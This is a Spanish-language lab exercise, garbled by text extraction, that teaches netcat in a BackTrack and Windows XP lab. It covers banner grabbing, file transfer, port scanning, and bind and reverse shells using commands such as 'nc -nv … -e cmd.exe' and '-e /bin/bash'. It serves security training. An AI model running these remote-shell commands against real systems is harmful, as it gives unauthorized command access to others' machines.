Sie sind auf Seite 1von 7

Prcticas de -aboratorio Modulo Anlisis de Vulnerabilidades7 Vulnerabilidades Prctica de laboratorio Anexa +.mero /: +012A1 bsico.

Objetivos:

PR3502 889

Conocer de forma bsica y aplicar de forma prctica las diferentes funcionalidades que ofrece la herramienta netcat Recursos: Linux Backtrack 5R2 Archivo binario nc.exe +locali"ado en/ /#entest/windows3binaries/tools binaries/tools, se puede copiar y pe ar a la ra!" de $indo%s &' usando 67$AR#) #quipo $indo%s &' atack Recomendaciones: Copiar y(o descar ar la herramienta netcat +nc)exe, a la ra!" +c, del disco duro de la maquina $indo%s &' atack) 45e #uede encontrar un arc ivo dentro de la #agina web www.dsteamseguridad.com/ ac!ingc" dentro de la car#eta de ex#lotaci)n$ ex#lotaci)n car#eta tools$ all% encontraras un arc ivo llamado nc.txt$ bjalo a la ra%, del disco duro d &indows 'P ( ren)mbralo como nc.exe6 Las mquinas virtuales Linux Backtrack y $indo%s &' atack* deben de tener conexi;n entre s! +probar lo anterior con el comando pin , *ntroducci)n: +etcat es una herramienta que apoya las labores de 3ackin y 'enetration n 0estin 0 * la cual es llamada la navaja sui,a* por la variedad de usos que se le puede dar a esta poderosa herramienta) -ue inicialmente escrita en octubre de 899:* * pero con el paso del tiempo* y el avance de las tecnolo !as de la informaci;n* han aparecido otras versiones me1oradas de esta herramienta) -ue una herramienta escrita esc inicialmente para sistemas <=>&* pero a la fecha existen versiones de netcat para diversos sistemas operativos) operativo .ustificando el nombre con que se conoce esta herramienta* el cual es la navaja sui,a* netcat sirve para reali"ar r las si uientes labores/ Abrir puertos 0C' y traba1ar traba1 sobre ellos 'ermite conexiones del tipo +Cliente(2ervidor, 3acer scannin de puertos reali"ar procesos rocesos de Banner 4rabbin Abrir puertas traseras +Backdoors, 0rasferir archivos Redireccionar puertos 5 mucho mass))))))))))))))))))

'ara conocer ms de esta herramienta* se debe de reali"ar la si uiente prctica de laboratorio/

#1ecuci;n del taller de laboratorio/ Paso n.mero 9 :A(uda ( o#ciones de netcat:/ #1ecutar desde la consola de comandos de Linux backtrack el si uiente comando/ nc -h Con el anterior comando se podrn ver todas las opciones de netcat con su respectiva explicaci;n)

Paso n.mero ; :<anner =rabbing:: <tili"ar netcat para conectarse a un servicio 0C' que sabemos est abierto) 'ara el caso vamos a usar el puerto 0C' 28 que est a la escucha en el equipo $indo%s 2erver 2??@ 7e atron) Lo anterior se lo ra con el si uiente comando/ nc -vn direccion_ip_windows_server numero_puerto

Paso n.mero / :Abrir un #uerto con netcat:: <tili"ar netcat #ara #oner un #uerto a la escuc a) 'ara lo rar lo anterior* debemos de hacer lo si uiente/ #1ecutar el si uiente comando en el equipo $indo%s &' +desde la consola de comandos cmd)exe) nc -lvp 4447

5 desde la maquina Linux backtrack* e1ecutar el si uiente comandos desde la shell de comandos) nc -v direccion ip windows XP 4447 'ara probar ambas conexiones* comen"ar a reali"ar un tipo de chat entre ambas maquinas* tal y como se muestra en las si uientes im enes) 7aquina que abre la conexi;n +%indo%s &',

7aquina que se conecta al puerto 0C' AAAB +Linux Backtrack,

+ota: La anterior conexi;n puede interpretarse como una conexi;n del tipo brid e +entre cliente y servidor,* ya que no hay dispositivos del tipo Router o -ire%all entre las conexiones del cliente y el servidor) Paso n.mero " :1ras>erencia de arc ivos con netcat:: <tili"ar netcat para tras>erir arc ivos entre dos ma?uinas* que para el caso sern $indo%s &' atack y Linux Backtrack) 'ara poder trasferir archivos entre ambas maquinas* se debe de hacer lo si uiente/ #n la maquina Linux* e1ecutar el si uiente comando/ nc -lvp 7777 > output.txt Lue o desde la maquina con $indo%s &'* crear un archivo de texto sencillo con el si uiente comando/

Lue o desde la maquina $indo%s &' se debe de di itar el si uiente comando/ nc -vv ip_de_ backtrack 7777 < texto.txt #sperar unos se undos para que el comando se termine de e1ecutar))) Luego in resar a backtrack y darle las teclas ctrlCC para detener la e1ecuci;n de netcat

-inalmente se debe de verificar en linux backtrack* si el archivo se ha trasferido correctamente) Lo anterior se lo ra di itando el comando cat* se uido del nombre del archivo)

Paso n.mero @ :5canning de Puertos con netcat:: <tili"ar netcat para reali"ar un scannin bsico de puertos) Lo anterior se puede lo rar e1ecutando el si uiente comando desde la maquina Linux backtrack) +<sar como tar et destino $indo%s 2??@ 2erver me atron,

Paso n.mero A :Administraci)n remota 42onexi)n Birecta6 con netcat:: <tili"ar netcat para reali"ar procesos de administraci;n remota de host) 'ara lo rar administrar de forma remota una maquina Linux* yDo $indo%s* se debe de reali"ar lo si uiente/ Administraci;n de la maquina $indo%s &'* desde Linux Backtrack +Ambas en conexi;n tipo Brid eDConexi;n directa, Locali"ado en la consola de comandos de $indo%s &' +cmd)exe, e1ecutar el si uiente comando netcat/ nc -lvvp 4445 -e cmd.exe

Lue o in resar a la consola de comandos de Linux backtrack* y e1ecutar el si uiente comando/ nc -vnn direccion_ip_ indows_XP 4445

!ota" 2e debe de esperar unos se undos para que se abra la conexi;n) Ahora se pueden e1ecutar comandos cmd)exe desde backtrack

Administraci;n de la maquina Linux Backtrack desde $indo%s &' >n resar a la consola de comandos de Linux backtrack* y e1ecutar el si uiente comando/ nc -lvvp #$%45 -e &bin&bash

Lue o in resar a la consola de comandos de $indo%s &' +cmd)exe, y e1ecutar el si uiente comando/ nc -vnn direccion-ip_backtrack #$%45

!ota" 2e debe de esperar unos se undos para que se abra la conexi;n) Ahora se pueden e1ecutar comandos bin(bash desde la consola de comandos cmd)exe de %indo%s &'D

Paso n.mero C :Administraci)n remota 42onexi)n reversa6 con netcat:: <tili"ar netcat para reali"ar procesos de administraci;n remota de host) 'ara lo rar administrar de forma remota una maquina Linux* yDo $indo%s* se debe de reali"ar lo si uiente/ Administraci;n de la maquina $indo%s &'* desde Linux Backtrack +<sando conexi;n tipo =A0D ->R#$ALLDRE<0#RDConexi;n reversa,

Locali"ado en la consola de comandos de Linux Backtrack* e1ecutar el si uiente comando* para poner un puerto 0C' a la escucha +Listenin ,) nc -lvvp 5555

Lue o se debe de lan"ar el si uiente comando desde el equipo $indo%s &'/ nc -nv direccion_ip_backtrack 5555 -e cmd.exe

Fe forma automtica Linux backtrack debe de tener una shell de comandos cmd)exe* lo rando as! una conexi;n reversa +=o directa,

Administraci;n de la maquina Linux Backtrack desde una maquina $indo%s &' +<sando conexi;n tipo =A0D->R#$ALLDRE<0#RDConexi;n reversa,

Locali"ado en la consola de comandos de $indo%s &'* e1ecutar el si uiente comando* para poner un puerto 0C' a la escucha +Listenin ,) nc -lvvp ''''

Lue o se debe de lan"ar el si uiente comando desde el equipo Linux Backtrack/ nc -nv direccion_ip_win_XP '''' -e &bin&bash

2i volvemos a la maquina $indo%s &'* observamos que lue o de unos se undos se abre de forma automtica una shell donde podemos e1ecutar comandos desde la shell de $indo%s +cmd)exe, a la shell de Linux backtrack)+6er la si uiente ima en,

Das könnte Ihnen auch gefallen